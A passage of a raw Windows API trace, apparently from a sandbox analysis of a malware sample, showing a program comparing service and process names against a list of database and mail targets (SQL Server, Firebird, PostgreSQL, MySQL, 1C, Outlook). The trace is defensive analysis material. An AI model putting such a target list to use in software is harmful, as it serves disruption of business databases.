(lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0056.329] lstrlenW (lpString="EventSystem") returned 11 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0056.329] lstrlenW (lpString="gpsvc") returned 5 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0056.329] lstrlenW (lpString="iphlpsvc") returned 8 [0056.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.329] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0056.329] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0056.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0056.330] lstrlenW (lpString="LanmanServer") returned 12 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0056.330] lstrlenW (lpString="LanmanWorkstation") returned 17 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0056.330] lstrlenW (lpString="lmhosts") returned 7 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0056.330] lstrlenW (lpString="MMCSS") returned 5 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0056.330] lstrlenW (lpString="MpsSvc") returned 6 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0056.330] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0056.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0056.330] lstrlenW (lpString="Netman") returned 6 [0056.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0056.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0056.330] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0056.331] lstrlenW (lpString="netprofm") returned 8 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0056.331] lstrlenW (lpString="NlaSvc") returned 6 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0056.331] lstrlenW (lpString="nsi") returned 3 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0056.331] lstrlenW (lpString="PcaSvc") returned 6 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0056.331] lstrlenW (lpString="PlugPlay") returned 8 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0056.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0056.331] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0056.331] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0056.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0056.331] lstrlenW (lpString="Power") returned 5 [0056.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0056.332] lstrlenW (lpString="ProfSvc") returned 7 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0056.332] lstrlenW (lpString="RpcEptMapper") returned 12 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0056.332] lstrlenW (lpString="RpcSs") returned 5 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0056.332] lstrlenW (lpString="SamSs") returned 5 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0056.332] lstrlenW (lpString="Schedule") returned 8 [0056.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0056.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0056.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0056.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0056.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0056.333] lstrlenW (lpString="SENS") returned 4 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0056.333] lstrlenW (lpString="ShellHWDetection") returned 16 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0056.333] lstrlenW (lpString="Spooler") returned 7 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0056.333] lstrlenW (lpString="swprv") returned 5 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0056.333] lstrlenW (lpString="SysMain") returned 7 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0056.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0056.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0056.333] lstrlenW (lpString="Themes") returned 6 [0056.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0056.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0056.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0056.334] lstrlenW (lpString="TrkWks") returned 6 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0056.334] lstrlenW (lpString="UxSms") returned 5 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0056.334] lstrlenW (lpString="VSS") returned 3 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0056.334] lstrlenW (lpString="WdiServiceHost") returned 14 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0056.334] lstrlenW (lpString="WdiSystemHost") returned 13 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.334] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0056.334] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0056.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0056.334] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0056.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0056.335] lstrlenW (lpString="Winmgmt") returned 7 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0056.335] lstrlenW (lpString="WPDBusEnum") returned 10 [0056.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0056.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0056.335] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x570000) returned 1 [0056.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x154 [0056.337] Process32FirstW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.338] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.339] lstrlenW (lpString="System") returned 6 [0056.339] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0056.339] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0056.357] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0056.358] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0056.358] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0056.358] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.358] lstrlenW (lpString="smss.exe") returned 8 [0056.358] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0056.358] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0056.358] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0056.359] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.359] lstrlenW (lpString="csrss.exe") returned 9 [0056.359] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0056.359] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0056.359] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0056.359] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0056.359] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0056.360] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0056.360] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.360] lstrlenW (lpString="wininit.exe") returned 11 [0056.360] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0056.360] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0056.360] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0056.360] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.361] lstrlenW (lpString="csrss.exe") returned 9 [0056.361] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.362] lstrlenW (lpString="winlogon.exe") returned 12 [0056.362] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.363] lstrlenW (lpString="services.exe") returned 12 [0056.363] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.363] lstrlenW (lpString="lsass.exe") returned 9 [0056.363] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0056.364] lstrlenW (lpString="lsm.exe") returned 7 [0056.364] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.365] lstrlenW (lpString="svchost.exe") returned 11 [0056.365] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.366] lstrlenW (lpString="svchost.exe") returned 11 [0056.366] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.366] lstrlenW (lpString="svchost.exe") returned 11 [0056.366] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.367] lstrlenW (lpString="svchost.exe") returned 11 [0056.367] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.368] lstrlenW (lpString="svchost.exe") returned 11 [0056.368] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.369] lstrlenW (lpString="audiodg.exe") returned 11 [0056.369] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.369] lstrlenW (lpString="svchost.exe") returned 11 [0056.369] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.370] lstrlenW (lpString="svchost.exe") returned 11 [0056.370] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.371] lstrlenW (lpString="dwm.exe") returned 7 [0056.371] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.372] lstrlenW (lpString="explorer.exe") returned 12 [0056.372] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.373] lstrlenW (lpString="spoolsv.exe") returned 11 [0056.373] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.373] lstrlenW (lpString="taskhost.exe") returned 12 [0056.373] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, 